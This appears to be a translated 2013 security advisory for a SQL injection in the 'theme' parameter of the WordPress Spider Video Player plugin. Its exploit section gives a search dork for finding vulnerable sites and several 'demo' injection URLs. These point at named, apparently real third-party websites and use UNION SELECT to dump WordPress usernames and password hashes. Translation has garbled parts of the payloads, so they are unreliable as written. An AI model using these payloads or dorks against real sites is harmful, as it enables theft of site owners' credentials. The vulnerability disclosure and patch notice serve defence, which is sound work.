WordPress Spider Video Player Plug-in 'Theme 'parameter SQL Injection Vulnerability

Release date:
Updated on: 2013-04-12

Affected Systems:
WordPress Spider Video Player <2.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59021
 
WordPress Spider Video Player is a Video Player Plug-in.
 
Spider Video Player 2.1 has the SQL injection vulnerability. Attackers can exploit this vulnerability to perform unauthorized database operations.
 
<* Source: Ashiyane Digital Security Team

Link: http://packetstormsecurity.com/files/121250/WordPress-Spider-Video-Player-2.1-SQL-Injection.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
##############
# Exploit Title: Wordpress Spider Video Player plugin SQL Injection
#
# Exploit Author: Ashiyane Digital Security Team
#
# Plugin Link: http://web-dorado.com/
#
# Home: www.ashiyane.org
#
# Security Risk: High
#
# Version: 2.1
#
# Dork: inurl: wp-content/plugins/player/settings. php? Playlist =
#
# Tested on: Linux
#
##############
# Location: site/wp-content/plugins/player/settings. php? Playlist = [num] & theme = [SQL]
#
#
# DEm0:
# Http://www.voyager-channel.org/wp-content/plugins/player/settings.php? Playlist = 2 & theme =-1 + union + select +, 3, group_concat % 28user_login, 0x3a, user_pass %, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, medium, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, medium, 44,45, 46,47, 48, 49, 50, 51, 52 + from + middle --
#
# Http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php? Playlist = 1 & theme =-6 + union + select +, 3, group_concat % 28user_login, 0x3a, user_pass %, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, medium, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, medium, 44,45, 46,47, 48, 49, 50, 51, 52 + from + middle --
#
# Http://tremendum.org/wp-content/plugins/player/settings.php? Playlist = 1 & theme =-7 + union + select +, 3, group_concat % 28user_login, 0x3a, user_pass %, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, medium, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, medium, 44,45, 46,47, 48, 49, 50, 51, 52 + from + middle --
#
# Http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php? Playlist = 1 & theme =-4 + union + select +, 3, group_concat % 28user_login, 0x3a, user_pass %, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, medium, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, medium, 44,45, 46,47, 48, 49, 50, 51, 52 + from + middle --
#
# Http://www.lancssa.com/wp-content/plugins/player/settings.php? Playlist = 2 & theme =-7 + union + select +, 3, group_concat % 28user_login, 0x3a, user_pass %, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, medium, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, medium, 44,45, 46,47, 48, 49, 50, 51, 52 + from + middle --
#
##############
# Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://wordpress.org/extend/plugins/player/